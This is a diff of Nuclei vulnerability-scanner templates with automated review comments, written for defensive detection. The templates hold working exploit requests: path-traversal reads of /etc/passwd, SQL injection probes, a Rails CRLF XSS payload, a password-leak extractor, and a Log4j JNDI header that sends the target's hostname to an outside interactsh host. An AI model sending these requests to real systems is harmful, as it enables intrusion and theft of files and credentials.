@@ -0,0 +1,28 @@ +id: xerox-efi-lfi + +info: + name: Xerox DC260 EFI Fiery Controller Webtools 2.0 - Arbitrary File Disclosure + author: gy741 + severity: high + description: Input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary + files on the affected system. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5447.php + - https://packetstormsecurity.com/files/145570 + - https://www.exploit-db.com/exploits/43398/ + tags: iot,xerox,disclosure,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wt3/forceSave.php?file=/etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/yapi-rce.yaml b/vulnerabilities/other/yapi-rce.yaml index e9f9d9d864..0078f2b883 100644 --- a/vulnerabilities/other/yapi-rce.yaml +++ b/vulnerabilities/other/yapi-rce.yaml @@ -4,13 +4,13 @@ info: name: Yapi Remote Code Execution author: pikpikcu severity: critical - tags: yapi,rce description: A vulnerability in Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code. reference: - https://www.secpulse.com/archives/162502.html - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b - https://twitter.com/sec715/status/1415484190561161216 - https://github.com/YMFE/yapi + tags: yapi,rce requests: - raw: diff --git a/vulnerabilities/other/yarn-resourcemanager-rce.yaml b/vulnerabilities/other/yarn-resourcemanager-rce.yaml index 1189161af1..03e359a5d1 100644 --- a/vulnerabilities/other/yarn-resourcemanager-rce.yaml +++ b/vulnerabilities/other/yarn-resourcemanager-rce.yaml 
@@ -4,9 +4,10 @@ info: name: Apache Yarn ResourceManager RCE author: pdteam severity: low - tags: apache,rce description: A vulnerability in Apache Yarn ResourceManager allows remote unauthenticated users to cause the product to execute arbitrary code. - reference: https://neerajsabharwal.medium.com/hadoop-yarn-hack-9a72cc1328b6 + reference: + - https://neerajsabharwal.medium.com/hadoop-yarn-hack-9a72cc1328b6 + tags: apache,rce requests: - method: POST diff --git a/vulnerabilities/other/yishaadmin-lfi.yaml b/vulnerabilities/other/yishaadmin-lfi.yaml new file mode 100644 index 0000000000..3d516701fa --- /dev/null +++ b/vulnerabilities/other/yishaadmin-lfi.yaml @@ -0,0 +1,27 @@ +id: yishaadmin-lfi + +info: + name: yishaadmin path traversal + author: Evan Rubinstein + severity: high + description: An endpoint in yshaadmin "/admin/File/DownloadFile" was improperly secured, allowing for files to be downloaded, read or deleted without any authentication. + reference: + - https://huntr.dev/bounties/2acdd87a-12bd-4ce4-994b-0081eb908128/ + - https://github.com/liukuo362573/YiShaAdmin/blob/master/YiSha.Util/YiSha.Util/FileHelper.cs#L181-L186 + tags: lfi,yishaadmin + +requests: + - raw: + - | + GET /admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0 HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/yonyou-u8-oa-sqli.yaml b/vulnerabilities/other/yonyou-u8-oa-sqli.yaml new file mode 100644 index 0000000000..e65cbf9cab --- /dev/null +++ b/vulnerabilities/other/yonyou-u8-oa-sqli.yaml 
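Review bot: The yarn-resourcemanager-rce hunk only reshapes `reference`, but the context it shows still carries `severity: low` for a template whose name and description describe unauthenticated remote code execution on the ResourceManager, so its findings will be buried under low-severity noise. Since the info block is being touched anyway, `severity: critical` (or at least high) would match the description and the other RCE templates in this directory. The requests section continues outside the hunk.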
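Review bot: The yishaadmin-lfi request sends `&delete=0`, and the description states the same endpoint can delete files, yet nothing in the template warns that flipping or dropping that parameter turns a read-only check into a destructive one. Add a comment above the raw request, `# keep delete=0: per the reference the same endpoint deletes the target file when delete is set`, so a later cleanup does not strip what looks like a no-op parameter. The deletion behaviour is taken from the description and the linked FileHelper.cs lines, not verified here.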
@@ -0,0 +1,25 @@ +id: yonyou-u8-oa-sqli + +info: + name: Yonyou U8 OA Sqli + author: ritikchaddha + severity: high + reference: + - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20OA%20test.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html + tags: yonyou,oa,sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{randstr}}))" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5("{{randstr}}")}}' + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/zcms-v3-sqli.yaml b/vulnerabilities/other/zcms-v3-sqli.yaml index 3936c83257..61c4b5440d 100644 --- a/vulnerabilities/other/zcms-v3-sqli.yaml +++ b/vulnerabilities/other/zcms-v3-sqli.yaml @@ -1,9 +1,11 @@ id: zcms-v3-sqli + info: name: ZCMS SQL Injection author: princechaddha severity: high - reference: https://www.anquanke.com/post/id/183241 + reference: + - https://www.anquanke.com/post/id/183241 tags: zcms,sqli requests: diff --git a/vulnerabilities/other/zhiyuan-file-upload.yaml b/vulnerabilities/other/zhiyuan-file-upload.yaml index f596b39871..4057d76160 100644 --- a/vulnerabilities/other/zhiyuan-file-upload.yaml +++ b/vulnerabilities/other/zhiyuan-file-upload.yaml 
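Review bot: The SQL payload in yonyou-u8-oa-sqli is `(SELECT md5({{randstr}}))`, where `{{randstr}}` expands to a bare alphanumeric token; in MySQL an unquoted token inside `md5(...)` is parsed as a column name and raises an unknown-column error unless the application itself wraps `S1` in quotes, in which case the match on `{{md5("{{randstr}}")}}` never succeeds. If the injection point is numeric, use a number on both sides, e.g. a `variables: num: "{{rand_int(10000, 99999)}}"` block with `S1=(SELECT%20md5({{num}}))` and a word of `'{{md5(num)}}'`; if it is a string context, URL-encode quotes around the token instead. Worth confirming against the referenced PeiQi write-up which form the original PoC used.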
@@ -1,12 +1,14 @@ id: zhiyuan-file-upload info: - name: Zhiyuan OA arbitrary file upload vulnerability + name: Zhiyuan OA Arbitrary File Upload Vulnerability author: gy741 severity: critical - description: A vulnerability in Zhiyuan OA allows remote unauthenticated attackers to upload arbitrary files to the remote server which they can later access and cause their code to be executed. - reference: https://www.programmersought.com/article/92658169875/ - tags: zhiyuan,rce + description: A vulnerability in Zhiyuan OA allows remote unauthenticated attackers to upload arbitrary files to the remote server and cause execute arbitrary code to be executed. + reference: + - https://www.programmersought.com/article/92658169875/ + remediation: Apply the appropriate patch. + tags: zhiyuan,rce,upload requests: - method: GET @@ -27,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/04 diff --git a/vulnerabilities/other/zhiyuan-oa-info-leak.yaml b/vulnerabilities/other/zhiyuan-oa-info-leak.yaml index 668eacf45e..53256a5be1 100644 --- a/vulnerabilities/other/zhiyuan-oa-info-leak.yaml +++ b/vulnerabilities/other/zhiyuan-oa-info-leak.yaml @@ -4,7 +4,8 @@ info: name: Zhiyuan Oa A6-s info Leak author: pikpikcu severity: info - reference: https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md + reference: + - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md tags: zhiyuan,leak,disclosure requests: diff --git a/vulnerabilities/other/zhiyuan-oa-session-leak.yaml b/vulnerabilities/other/zhiyuan-oa-session-leak.yaml index deccd94de0..0bc5c52bf0 100644 --- a/vulnerabilities/other/zhiyuan-oa-session-leak.yaml +++ b/vulnerabilities/other/zhiyuan-oa-session-leak.yaml 
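Review bot: The rewritten description in zhiyuan-file-upload reads `cause execute arbitrary code to be executed`, which is ungrammatical, and the added `remediation: Apply the appropriate patch.` names no patch, so neither line helps a triager. Suggest `description: A vulnerability in Zhiyuan OA allows remote unauthenticated attackers to upload arbitrary files to the server, which can then be requested to execute arbitrary code.` and either a concrete remediation taken from the reference or dropping the line. The requests section continues outside the hunk.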
@@ -5,7 +5,8 @@ info: author: pikpikcu severity: medium description: A vulnerability in Zhiyuan OA allows remote unauthenticated users access to sensitive session information via the 'getSessionList.jsp' endpoint. - reference: https://www.zhihuifly.com/t/topic/3345 + reference: + - https://www.zhihuifly.com/t/topic/3345 tags: zhiyuan,leak,disclosure requests: diff --git a/vulnerabilities/other/zms-auth-bypass.yaml b/vulnerabilities/other/zms-auth-bypass.yaml index 38a20c3a9a..86b727fd15 100644 --- a/vulnerabilities/other/zms-auth-bypass.yaml +++ b/vulnerabilities/other/zms-auth-bypass.yaml @@ -5,7 +5,8 @@ info: author: dwisiswant0 severity: high description: A vulnerability in Zoo Management allows remote attackers to bypass the authentication mechanism via an SQL injection vulnerability. - reference: https://www.exploit-db.com/exploits/48880 + reference: + - https://www.exploit-db.com/exploits/48880 tags: auth-bypass,zms requests: diff --git a/vulnerabilities/rails/rails6-xss.yaml b/vulnerabilities/rails/rails6-xss.yaml index 05d14c2db1..6bc1c7b911 100644 --- a/vulnerabilities/rails/rails6-xss.yaml +++ b/vulnerabilities/rails/rails6-xss.yaml 
@@ -1,16 +1,18 @@ id: rails6-xss + +# XSS (6.0.0 < rails < 6.0.3.2); Payload is location=%0djavascript:alert(1); +# Nuclei has issues with 302 response missing a Location header thus the +# extended payload to make Nuclei work. +# Working poc by @Mad-robot +# /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0Djavascript%3Aalert%28document.domain%29 + info: name: Rails CRLF XSS (6.0.0 < rails < 6.0.3.2) author: ooooooo_q,rootxharsh,iamnoooob severity: medium - reference: https://hackerone.com/reports/904059 - tags: rails,xss - - # XSS (6.0.0 < rails < 6.0.3.2); Payload is location=%0djavascript:alert(1); - # Nuclei has issues with 302 response missing a Location header thus the - # extended payload to make Nuclei work. - # Working poc by @Mad-robot - # /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0Djavascript%3Aalert%28document.domain%29 + reference: + - https://hackerone.com/reports/904059 + tags: rails,xss,crlf requests: - method: POST diff --git a/vulnerabilities/ransomware/deadbolt-ransomware.yaml b/vulnerabilities/ransomware/deadbolt-ransomware.yaml new file mode 100644 index 0000000000..f0baa2ef88 --- /dev/null +++ b/vulnerabilities/ransomware/deadbolt-ransomware.yaml @@ -0,0 +1,16 @@ +id: deadbolt-ransomware + +info: + name: Deadbolt Ransomware Detection + author: pdteam + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + words: + - "ALL YOUR FILES HAVE BEEN LOCKED BY DEADBOLT." \ No newline at end of file diff --git a/vulnerabilities/rocketchat/unauth-message-read.yaml b/vulnerabilities/rocketchat/unauth-message-read.yaml index 3e4626f984..5ec32d7a37 100644 --- a/vulnerabilities/rocketchat/unauth-message-read.yaml +++ b/vulnerabilities/rocketchat/unauth-message-read.yaml 
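Review bot: The new deadbolt-ransomware template has no `tags`, `description` or `reference`, so it cannot be selected with `-tags` and gives the reader nothing on what a match means; every other new template in this diff carries at least tags. The word matcher has no `part` and no status check, which is acceptable because the banner string is specific, but `severity: info` understates a host whose landing page is a ransom note. Suggest `tags: ransomware,deadbolt`, a one-line `description` saying the page shows the DeadBolt ransom note, and a vendor advisory or news `reference`.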
@@ -5,7 +5,8 @@ info: author: rojanrijal severity: critical description: An issue with the Live Chat accepting invalid parameters could potentially allow unauthenticated access to messages and user tokens. - reference: https://docs.rocket.chat/guides/security/security-updates + reference: + - https://docs.rocket.chat/guides/security/security-updates tags: rocketchat,unauth requests: diff --git a/vulnerabilities/other/ruijie-eg-rce.yaml b/vulnerabilities/ruijie/ruijie-eg-rce.yaml similarity index 91% rename from vulnerabilities/other/ruijie-eg-rce.yaml rename to vulnerabilities/ruijie/ruijie-eg-rce.yaml index fc7ebb44a7..236a2e9889 100644 --- a/vulnerabilities/other/ruijie-eg-rce.yaml +++ b/vulnerabilities/ruijie/ruijie-eg-rce.yaml @@ -4,7 +4,8 @@ info: name: Ruijie EG cli.php RCE author: pikpikcu severity: critical - description: A vulnerability in Ruikie EG's cli.php end point allows remote unauthenticated attackers to gain 'admin' privileges. The vulnerability is exploitable because an unauthenticated user can gain 'admin' privileges due to a vulnerability in the login screen. + description: A vulnerability in Ruikie EG's cli.php end point allows remote unauthenticated attackers to gain 'admin' privileges. The vulnerability is exploitable because an unauthenticated user can gain 'admin' + privileges due to a vulnerability in the login screen. reference: - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md - https://www.ruijienetworks.com @@ -38,7 +39,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - "nobody:.*:0:0" part: body @@ -52,4 +53,4 @@ requests: group: 1 internal: true regex: - - 'admin ([a-zA-Z0-9#@]+)",' \ No newline at end of file + - 'admin ([a-zA-Z0-9#@]+)",' 
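Review bot: The rewrapped `description` in `ruijie-eg-rce` is a plain multi-line scalar, so YAML folds the two lines into one string only because the continuation line is indented deeper than the key; a future reindent silently turns it into a parse error or a stray key. A block scalar, `description: >-` followed by the indented text, makes the folding explicit and survives reformatting. The same wrapping is applied to `springboot-actuators-jolokia-xxe` further down in this diff.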
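Review bot: `root:.*:0:0:` in the `ruijie-eg-rce` matcher is tightened with a trailing colon, but the sibling alternative `nobody:.*:0:0` on the next line is left as before, and `.*` still accepts anything between the user name and the uid fields. The new WordPress LFI templates in this diff (`admin-word-count-column-lfi`, `amministrazione-aperta-lfi`, `cab-fare-calculator-lfi`) use `root:[x*]:0:0`, so two passwd-matching conventions now coexist; settling on one, e.g. `root:[x*]:0:0:`, keeps false-positive behaviour consistent across templates. The same change is made in `ruijie-networks-rce`, `samsung-wlan-ap-lfi` and `samsung-wlan-ap-rce`, the latter two with an untouched `bin:.*:1:1` alternative.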
diff --git a/vulnerabilities/other/ruijie-networks-lfi.yaml b/vulnerabilities/ruijie/ruijie-networks-lfi.yaml similarity index 93% rename from vulnerabilities/other/ruijie-networks-lfi.yaml rename to vulnerabilities/ruijie/ruijie-networks-lfi.yaml index 94f932e9bf..796119899a 100644 --- a/vulnerabilities/other/ruijie-networks-lfi.yaml +++ b/vulnerabilities/ruijie/ruijie-networks-lfi.yaml @@ -5,7 +5,8 @@ info: author: pikpikcu severity: high description: A vulnerability in Ruijie Networks Switch allows remote unauthenticated attackers to access locally stored files and retrieve their content via the 'download.do' endpoint. - reference: https://exploit-db.com/exploits/48755 + reference: + - https://exploit-db.com/exploits/48755 tags: ruijie,lfi requests: diff --git a/vulnerabilities/other/ruijie-networks-rce.yaml b/vulnerabilities/ruijie/ruijie-networks-rce.yaml similarity index 89% rename from vulnerabilities/other/ruijie-networks-rce.yaml rename to vulnerabilities/ruijie/ruijie-networks-rce.yaml index a93e658328..5285f1a570 100644 --- a/vulnerabilities/other/ruijie-networks-rce.yaml +++ b/vulnerabilities/ruijie/ruijie-networks-rce.yaml @@ -6,8 +6,8 @@ info: severity: critical reference: - https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py - - https://www.ruijienetworks.com # vendor homepage - tags: ruijie,rce + - https://www.ruijienetworks.com + tags: ruijie,rce,network requests: - raw: @@ -27,7 +27,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - "nobody:x:0:0:" part: body diff --git a/vulnerabilities/ruijie/ruijie-password-leak.yaml b/vulnerabilities/ruijie/ruijie-password-leak.yaml new file mode 100644 index 0000000000..f281f1862a --- /dev/null +++ b/vulnerabilities/ruijie/ruijie-password-leak.yaml 
@@ -0,0 +1,34 @@ +id: ruijie-password-leak + +info: + name: RG-UAC Ruijie Password Leak + author: ritikchaddha + severity: high + description: Security Notice of Information Disclosure Vulnerability in Multiple Firewall Devices + reference: + - https://forum.butian.net/share/177 + metadata: + shodan-query: http.html:"Get_Verify_Info" + tags: password,leak,ruijie,exposure,firewall,router + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: regex + regex: + - 'user_passwd\/\*"([a-z0-9]+)"\*\/\);' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'user_passwd\/\*"([a-z0-9]+)"\*\/\);' diff --git a/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml b/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml index 17b89f72fa..6a77076f13 100644 --- a/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml +++ b/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml @@ -4,7 +4,8 @@ info: name: Samsung Wlan AP (WEA453e) LFI author: pikpikcu severity: critical - reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ + reference: + - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ tags: xss,samsung,lfi requests: @@ -16,7 +17,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - "bin:.*:1:1" part: body - type: status diff --git a/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml b/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml index 801ec50137..3d2ab419f2 100644 --- a/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml +++ b/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml @@ -4,7 +4,8 @@ info: name: Samsung Wlan AP (WEA453e) RCE author: pikpikcu severity: critical - reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ + reference: + - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ tags: xss,samsung,rce requests: 
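Review bot: The `extractors` block in `ruijie-password-leak` writes the captured `user_passwd` value into the scan output, so nuclei result files and any reporting integration will hold live credentials for every matching host. That is the intended evidence, but it deserves a comment at the extractor, e.g. `# Extracted value is a credential; treat scan output as sensitive`, and the `matchers` regex would read more clearly with an explicit `part: body` as the extractor already has.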
@@ -17,7 +18,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - "bin:.*:1:1" part: body diff --git a/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml b/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml index bf1fbf958a..05a6201a35 100644 --- a/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml +++ b/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml @@ -4,8 +4,10 @@ info: name: Samsung Wlan AP (WEA453e) XSS author: pikpikcu severity: medium - reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ + reference: + - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ tags: xss,samsung,xss + requests: - method: GET path: diff --git a/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml b/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml index 9247d17e78..169542633f 100644 --- a/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml +++ b/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml @@ -1,11 +1,17 @@ id: simple-crm-sql-injection info: - name: Simple CRM 3.0 - 'email' SQL injection & Authentication Bypass + name: Simple CRM 3.0 SQL Injection and Authentication Bypass author: geeknik severity: high - reference: https://packetstormsecurity.com/files/163254/simplecrm30-sql.txt - tags: sqli,simplecrm,auth-bypass + description: Simple CRM 3.0 is susceptible to SQL injection and authentication bypass vulnerabilities. + reference: + - https://packetstormsecurity.com/files/163254/simplecrm30-sql.txt + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-89 + tags: sqli,simplecrm,auth-bypass,injection requests: - method: POST @@ -28,3 +34,5 @@ requests: words: - "text/html" part: header + +# Enhanced by mp on 2022/03/30 diff --git a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml index 8d86dd794f..d4673ea0fa 100644 
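Review bot: The `tags: xss,samsung,xss` line kept as context in `samsung-wlan-ap-xss` lists `xss` twice, and since the hunk already touches the adjacent `reference` and blank lines it is the place to fix it: `tags: xss,samsung`. The other Samsung templates in this diff use `xss,samsung,lfi` and `xss,samsung,rce`, so the duplicate looks like a copy-paste leftover.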
--- a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml +++ b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml @@ -4,7 +4,8 @@ info: name: Spring Boot Actuators (Jolokia) XXE author: dwisiswant0,ipanda severity: high - description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to perform an XML External Entities (XXE) attack and include content stored on a remote server as if it was its own. This has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine. + description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to perform an XML External Entities (XXE) attack and include content stored on a remote server as if it was its + own. This has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine. reference: - https://www.veracode.com/blog/research/exploiting-spring-boot-actuators - https://github.com/mpgn/Spring-Boot-Actuator-Exploit diff --git a/vulnerabilities/springboot/springboot-h2-db-rce.yaml b/vulnerabilities/springboot/springboot-h2-db-rce.yaml index 4d1e18bd32..6399788794 100644 --- a/vulnerabilities/springboot/springboot-h2-db-rce.yaml +++ b/vulnerabilities/springboot/springboot-h2-db-rce.yaml @@ -4,7 +4,6 @@ info: name: Spring Boot H2 Database RCE author: dwisiswant0 severity: critical - tags: springboot,rce,jolokia reference: - https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database - https://twitter.com/pyn3rd/status/1305151887964946432 @@ -12,6 +11,7 @@ info: - https://github.com/spaceraccoon/spring-boot-actuator-h2-rce metadata: shodan-query: http.favicon.hash:116323821 + tags: springboot,rce,jolokia requests: - raw: 
diff --git a/vulnerabilities/springboot/springboot-log4j-rce.yaml b/vulnerabilities/springboot/springboot-log4j-rce.yaml new file mode 100644 index 0000000000..4286931f8d --- /dev/null +++ b/vulnerabilities/springboot/springboot-log4j-rce.yaml @@ -0,0 +1,47 @@ +id: springboot-log4j-rce + +info: + name: Spring Boot Log4j Remote Code Injection + author: pdteam + severity: critical + reference: + - https://logging.apache.org/log4j/2.x/security.html + - https://www.lunasec.io/docs/blog/log4j-zero-day/ + - https://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cve-id: CVE-2021-44228 + cwe-id: CWE-502 + remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later). + tags: springboot,rce,oast,log4j + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + X-Api-Version: ${jndi:ldap://${hostName}.{{interactsh-url}}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + + extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output \ No newline at end of file diff --git a/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml b/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml index 811f02cb35..e54ece65b7 100644 --- a/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml +++ b/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml 
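Review bot: The `X-Api-Version` payload in `springboot-log4j-rce` resolves `${hostName}` on the target and sends it as a DNS label to `{{interactsh-url}}`, and the regex extractor then prints that hostname in the scan output; with the default public interactsh server the internal hostname of every vulnerable host is therefore disclosed to a third party and retained in reports. A comment stating this, such as `# NOTE: ${hostName} is sent to the interactsh server; use a self-hosted instance for sensitive scopes`, would help operators choose the OAST backend deliberately. The same pattern is used by `vmware-horizon-log4j-jndi-rce`, `vmware-vcenter-log4j-jndi-rce` and `vrealize-operations-log4j-rce` in this diff. The file also ends without a trailing newline.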
@@ -1,12 +1,13 @@ -id: squirrelmail-vkeyboard-xss +id: squirrelmail-address-xss info: name: SquirrelMail 1.4.2 Address Add Plugin - 'add.php' Cross-Site Scripting author: dhiyaneshDk severity: medium description: SquirrelMail Address Add Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. - reference: https://www.exploit-db.com/exploits/26305 - tags: xss,squirrelmail + reference: + - https://www.exploit-db.com/exploits/26305 + tags: xss,squirrelmail,plugin requests: - method: GET diff --git a/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml b/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml index 39c58f0758..f87a7c33a5 100644 --- a/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml +++ b/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml @@ -4,7 +4,8 @@ info: name: SquirrelMail 1.2.11 Local File Inclusion author: dhiyaneshDk severity: high - reference: https://www.exploit-db.com/exploits/22793 + reference: + - https://www.exploit-db.com/exploits/22793 tags: lfi,squirrelmail requests: diff --git a/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml b/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml index b52889fbf8..dddf453c8f 100644 --- a/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml +++ b/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml @@ -5,8 +5,9 @@ info: author: dhiyaneshDk severity: medium description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. - reference: https://www.exploit-db.com/exploits/34814 - tags: xss,squirrelmail + reference: + - https://www.exploit-db.com/exploits/34814 + tags: xss,squirrelmail,plugin requests: - method: GET diff --git a/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml b/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml index b35db666c5..aaec11c2ff 100644 
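Review bot: The new `id: squirrelmail-address-xss` no longer matches the file name `squirrelmail-add-xss.yaml`; every other template in this diff keeps the id equal to the basename, and if the repository's template checks rely on that convention this file will be flagged. Either rename the file or use `id: squirrelmail-add-xss`. The rename also appears to resolve an id collision with `squirrelmail-vkeyboard-xss.yaml`, which is worth stating in the commit message since consumers filtering by template id will see the old id disappear.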
--- a/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml +++ b/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml @@ -4,7 +4,8 @@ info: name: ThinkCMF Arbitrary code execution author: pikpikcu severity: high - reference: https://www.shuzhiduo.com/A/l1dygr36Je/ + reference: + - https://www.shuzhiduo.com/A/l1dygr36Je/ tags: thinkcmf requests: diff --git a/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml b/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml index 78d8dc35ef..f226eaae21 100644 --- a/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml +++ b/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml @@ -4,11 +4,12 @@ info: name: ThinkCMF LFI author: pikpikcu severity: high - reference: https://www.freebuf.com/vuls/217586.html - tags: thinkcmf,lfi + reference: + - https://www.freebuf.com/vuls/217586.html metadata: - win-payload: "../../../../../../../../../../../../../../../../windows/win.ini" - unix-payload: "../../../../../../../../../../../../../../../../etc/passwd" + win-payload: ../../../../../../../../../../../../../../../../windows/win.ini + unix-payload: ../../../../../../../../../../../../../../../../etc/passwd + tags: thinkcmf,lfi requests: - method: GET diff --git a/vulnerabilities/thinkcmf/thinkcmf-rce.yaml b/vulnerabilities/thinkcmf/thinkcmf-rce.yaml index b7dee6350d..cd53e288b5 100644 --- a/vulnerabilities/thinkcmf/thinkcmf-rce.yaml +++ b/vulnerabilities/thinkcmf/thinkcmf-rce.yaml @@ -4,7 +4,8 @@ info: name: ThinkCMF RCE author: pikpikcu severity: critical - reference: https://www.freebuf.com/vuls/217586.html + reference: + - https://www.freebuf.com/vuls/217586.html tags: thinkcmf,rce requests: diff --git a/vulnerabilities/thinkphp/thinkphp-2-rce.yaml b/vulnerabilities/thinkphp/thinkphp-2-rce.yaml index e48e8357e1..daac2251b9 100644 --- a/vulnerabilities/thinkphp/thinkphp-2-rce.yaml +++ b/vulnerabilities/thinkphp/thinkphp-2-rce.yaml @@ -1,5 +1,5 @@ id: thinkphp-2-rce - + info: name: ThinkPHP 2 / 3 's' Parameter RCE author: dr_set 
